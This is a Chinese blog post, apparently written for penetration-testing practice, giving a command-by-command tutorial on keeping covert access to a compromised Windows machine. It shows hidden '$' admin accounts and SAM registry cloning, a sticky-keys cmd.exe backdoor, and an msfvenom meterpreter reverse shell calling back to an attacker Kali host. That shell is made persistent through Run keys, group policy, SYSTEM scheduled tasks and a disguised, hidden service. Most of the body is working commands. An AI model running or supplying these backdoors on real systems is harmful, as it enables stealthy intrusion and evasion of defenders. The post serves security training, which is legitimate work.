windows权限维持

最新推荐文章于 2024-05-01 06:14:19 发布
最新推荐文章于 2024-05-01 06:14:19 发布
阅读量519 收藏 2
点赞数 3
分类专栏: 护网 渗透测试 文章标签: windows 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44704184/article/details/125656056
版权

一、隐藏用户维持

1、$符号隐藏用户

在用户名后添加$符号

在这里插入图片描述

当前有四个用户

在这里插入图片描述
net user hack$ 123@abc /add
(我命令执行发生错误,所以手动添加了一个)
在这里插入图片描述
可以看到命令行查不到新添加的用户(test是我删了的)

2、注册表克隆用户隐藏

regedit进入注册表
在这里插入图片描述
SAM两个权限都给一下
在这里插入图片描述
找到本机用户及对应文件夹
在这里插入图片描述
导出hack$用户
在这里插入图片描述
在这里插入图片描述
将administrator文件夹中F的值复制到hack$对应文件夹中的F
在这里插入图片描述
导出hack$对应的文件夹注册表
在这里插入图片描述
net user hack$ /del
(删除hack$用户,我的还是不对,所以手动删除)
在这里插入图片描述
双击前边保存的1,2注册表
在这里插入图片描述
可以在注册表中看到有添加
在这里插入图片描述
在这里插入图片描述
但在其他地方一般办法都看不到

二、shift后门维持

如果登录按5次shift出现的粘贴键是当前用户,如果没有登录则是最高权限
1、原理:把cmd.exe这个程序替换掉Sethc.exe,之后连按五次就会执行cmd.exe程序
2、制作(需要在管理员权限下)
首先更改文件权限

takeown /f c:\windows\system32\*.* /a /r /d y
强制将当前目录下的所有文件夹、子文件夹下的所有者改为管理员组

在这里插入图片描述

cacls c:\windows\system32\*.*  /T /E /G administrators:F
在当前目录下的文件、子文件夹的NTFS权限上添加管理员组完全控制权限

在这里插入图片描述

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe
制作后门

在这里插入图片描述
在这里插入图片描述
实际效果

三、启动项维持

1、组策略维持

原理:在组策略中添加payload,利用组策略的自启动策略来加载payload文件
在这里插入图片描述
运行gpedit.msc打开本地组策略编辑器,找到脚本并启动

kali:192.168.52.133
windows:192.168.52.132

msfvenom ­-p windows/x64/meterpreter/reverse_http ­-e x86/shikata_ga_nai -­i 15 ­-b ‘\x00’ lhost=192.168.52.133 lport=3333 ­-f psh -­o shell.ps1
在这里插入图片描述
此处利用python传送到客户端文件,一般可能需要用到蚁剑等工具
python -m SimpleHTTPServer 8000
在这里插入图片描述
@echo off
powershell.exe ­w hidden ­ExecutionPolicy Bypass ­NoExit ­File
C:\Users\Administrator\Desktop\keep\shell.ps1
exit
创建一个bat脚本
在这里插入图片描述
添加到启动项
在这里插入图片描述

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 192.168.52.133
set LPORT 3333
run

kali运行msf进行监听,重启客户端查看是否连接

2、启动文件夹维持

找到启动文件夹,将需要启动的文件放入就好

3、注册表维持

在运行框中输入 “regedit ”,点击确定或者直接按键盘上的回车键,打开组策略
Windows注册表存在的自启动后门较多,此类后门主要利用原理为将Payload文件植入具备自启动特性的注册表中,这样Payload就会在计算机启动过程被执行

这些都可以
# HKEY_LOCAL_MACHINE类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
# HKEY_CURRENT_USER类
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

在这里插入图片描述
在此添加之前的组策略维持用到的就行
在这里插入图片描述

将之前的1.bat添加到注册表中
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v shell /t
REG_SZ /d "C:\Users\Administrator\Desktop\keep\1.bat"

等开机登录进去之后即可连接kali的msf

四、计划任务维持

在这里插入图片描述

1、schtasks

1、在每个任意用户登录中以SYSTEM的形式执行计划任务:
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onlogon /ru System
2、在系统启动期间或用户会话处于非活动状态(空闲模式)时执行
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onidle /i 30
3、在系统启动的时候以SYSTEM的形式执行计划任务:
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc onstart /ru System
4、计划任务以 System 权限每10分钟运行一次
schtasks /create /tn 计划任务名 /tr "计划任务执行文件命令" /sc minute/mo 10 /ru system

例如:利用前边的shell.ps1文件创建
schtasks /create /tn shell /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
­w hidden ­ExecutionPolicy Bypass ­NoExit ­File
C:\Users\Administrator\Desktop\keep\shell.ps1" /sc onstart /ru System

然后利用kali的msf查看连接情况

2、at

at 1:00AM /Every:Saturday 1.bat 在每个周六1:00点,电脑定时启动1,bat批处理文件。
at 1 /delete 删除任务

例如:利用前边的1.bat文件创建
at 00:00 C:\Users\Administrator\Desktop\keep\1.bat

然后利用kali的msf查看连接情况

3、powershell

五、创建服务维持

命令:sc
在这里插入图片描述

创建一个服务让他启动ps1脚本(注意空格)
sc create shell start= auto binPath= "cmd.exe /k powershell.exe ­w hidden ­ExecutionPolicy
Bypass ­NoExit ­File C:\Users\Administrator\Desktop\keep\shell.ps1" obj= Localsystem

对该服务进行伪装
sc description "shell" "绝对安全的shell哈哈哈"

设置服务的自动启动
sc config "shell" start= auto

然后启动该服务
net start "服务名"

隐藏服务
上边创建服务的方法隐藏性太弱,直接在服务里就能看到

可以在创建完服务后,使用以下命令将创建的服务隐藏,这样不论是在服务中,还是使用命令都查不到这个服务。
sc sdset shell "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

使用以下的命令进行恢复
sc sdset shell "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
"
凌晨四点的代码
关注
专栏目录
Windows权限维持
谢公子的博客
05-28 2287
目录 创建隐蔽账号 进程迁移 启动目录 横向渗透 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。 比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 创建隐蔽账号 如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。 或者读取该主机administrator账号密码,使用
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1193
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
权限维持
WX公众号-小白学安全
04-15 937
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术,包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用,欢迎留言分享。在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
windows 权限维持
weixin_52263461的博客
01-20 273
添加影子用户 影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户,但是在计算机管理里面还是可以看的到。 创建普通账号 net user huahua 123456 /add net localgroup administrators huahua /add (将用户加入组) 创建隐藏账户 net user huahua$ 123456 /add net user 查看
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
Telemetry:WINDOWS TELEMETRY权限维持
03-18
遥测 背景 是Windows持久性的C# 今天,我们将讨论一种持久性方法,该方法利用了Microsoft过去十年在Windows版本中包含的一些出色的遥测技术。 本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS TELEMETRY FOR PERSISTENCE .Imanfeng Features: Install: - Deployment authority maintains backdoor Command:
windows权限维持方法详解
内心不种满鲜花就会长满杂草
01-23 3688
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。 权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。
【内网安全】——Windows权限维持
Demo不是emo的博客
02-19 2977
Windows权限维持姿势汇总
2024年最全Windows权限维持技术总结、复现_cs权限维持(2)
最新发布
2401_84281601的博客
05-01 462
Windows 上有一个重要的机制,也就是服务。服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将 EXE 文件注册为服务来作为后门。Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式。
Windows 权限维持手法
qq_53742230的博客
07-20 913
Windows 权限维持手法总结
Window权限维持(二):计划任务
11-05 1002
Windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的日期和时间执行程序或脚本。这种行为可作为一种持久性机制被red team利用。通过计划任务执行持久性不需要管理员权限,但如果已获得提升的权限,则允许进一步操作,例如在用户登录期间或在空闲状态期间执行任务。 计划任务的持久化技术可以手动实现,也可以自动实现。有效负载可以从磁盘或远程位置执行,它们...
Windows权限维持方法
weixin_43722879的博客
08-15 613
Windows权限维持方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值